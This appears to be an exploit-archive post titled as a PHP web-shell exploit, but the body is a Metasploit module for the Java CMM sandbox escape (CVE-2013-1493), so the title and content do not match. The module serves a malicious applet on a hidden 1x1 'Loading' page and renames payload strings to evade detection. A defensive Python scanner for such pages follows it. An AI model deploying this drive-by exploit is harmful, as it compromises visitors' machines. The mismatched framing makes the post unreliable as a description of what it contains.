STUNSHELL PHP Web Shell Remote Code Execution
Posted on 2013-4-4 17:31:17
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn
  autopwn_info({ :javascript => false })

  def initialize( info = {} )
    super( update_info( info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
          This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Load the precompiled applet classes shipped with the framework and
  # randomise the name of the entry-point class.
  def setup
    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Init.class")
    @init_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "Leak.class")
    @leak_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyBufferedImage.class")
    @buffered_image_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

    path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-1493", "MyColorSpace.class")
    @color_space_class = File.open(path, "rb") { |fd| fd.read(fd.stat.size) }

    @init_class_name = rand_text_alpha("Init".length)
    @init_class.gsub!("Init", @init_class_name)

    super
  end

  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      # Serve the applet JAR: the payload JAR plus the exploit classes.
      jar = payload.encoded_jar
      jar.add_file("#{@init_class_name}.class", @init_class)
      jar.add_file("Leak.class", @leak_class)
      jar.add_file("MyBufferedImage.class", @buffered_image_class)
      jar.add_file("MyColorSpace.class", @color_space_class)

      # Rename the well-known payload entries so they do not match on name.
      metasploit_str = rand_text_alpha("metasploit".length)
      payload_str    = rand_text_alpha("payload".length)
      jar.entries.each { |entry|
        entry.name.gsub!("metasploit", metasploit_str)
        entry.name.gsub!("Payload", payload_str)
        entry.data = entry.data.gsub("metasploit", metasploit_str)
        entry.data = entry.data.gsub("Payload", payload_str)
      }
      jar.build_manifest

      send_response(cli, jar, { 'Content-Type' => "application/octet-stream" })
    when /\/$/
      payload = regenerate_payload(cli)
      if not payload
        print_error("Failed to generate the payload.")
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource() + '/', '')
    end
  end

  # Landing page: a 1x1 applet that loads the randomly named JAR.
  def generate_html
    html  = %Q|<html><head><title>Loading, Please Wait...</title></head>|
    html += %Q|<body><center><p>Loading, Please Wait...</p></center>|
    html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@init_class_name}.class" width="1" height="1">|
    html += %Q|</applet></body></html>|
    return html
  end

end
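As an added example that is not part of the original post or of the Metasploit module, the scanner below flags the shape of landing page that generate_html above serves: an applet element sized 1x1 (or with no size at all) that loads a .jar archive through a .class entry point. Both sample response bodies are constructed for the example; the first mirrors the module's page, the second is a benign, visibly sized applet.

```python
from html.parser import HTMLParser

# Constructed sample responses (not captured traffic). The first mirrors the
# page the module's generate_html builds, the second is a benign visible applet.
SAMPLE_DRIVE_BY = (
    '<html><head><title>Loading, Please Wait...</title></head>'
    '<body><center><p>Loading, Please Wait...</p></center>'
    '<applet archive="kqzpxlwv.jar" code="Xytk.class" width="1" height="1">'
    '</applet></body></html>'
)
SAMPLE_BENIGN = (
    '<html><body><applet archive="chart.jar" code="com.example.Chart.class" '
    'width="640" height="480"></applet></body></html>'
)


def _dimension(value):
    """Parse a width/height attribute; a missing or unparsable value is None."""
    try:
        return int(value.strip().rstrip("px"))
    except (ValueError, AttributeError):
        return None


class HiddenAppletScanner(HTMLParser):
    """Collect <applet> tags that load a .jar with a .class entry point into an
    element that is at most 1x1 or carries no size, the shape of a drive-by loader."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "applet":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        w, h = _dimension(a.get("width")), _dimension(a.get("height"))
        hidden = (w is None or w <= 1) and (h is None or h <= 1)
        jar = a.get("archive", "").lower().endswith(".jar")
        cls = a.get("code", "").lower().endswith(".class")
        if hidden and jar and cls:
            self.findings.append({"archive": a.get("archive"), "code": a.get("code"),
                                  "width": w, "height": h})


def scan_html(body):
    """Return the list of suspicious applet tags found in one HTML response body."""
    scanner = HiddenAppletScanner()
    scanner.feed(body)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    for name, body in (("drive-by", SAMPLE_DRIVE_BY), ("benign", SAMPLE_BENIGN)):
        print(name, scan_html(body))
```

The archive and class names are randomised per request by the module, so the check keys on structure rather than on names.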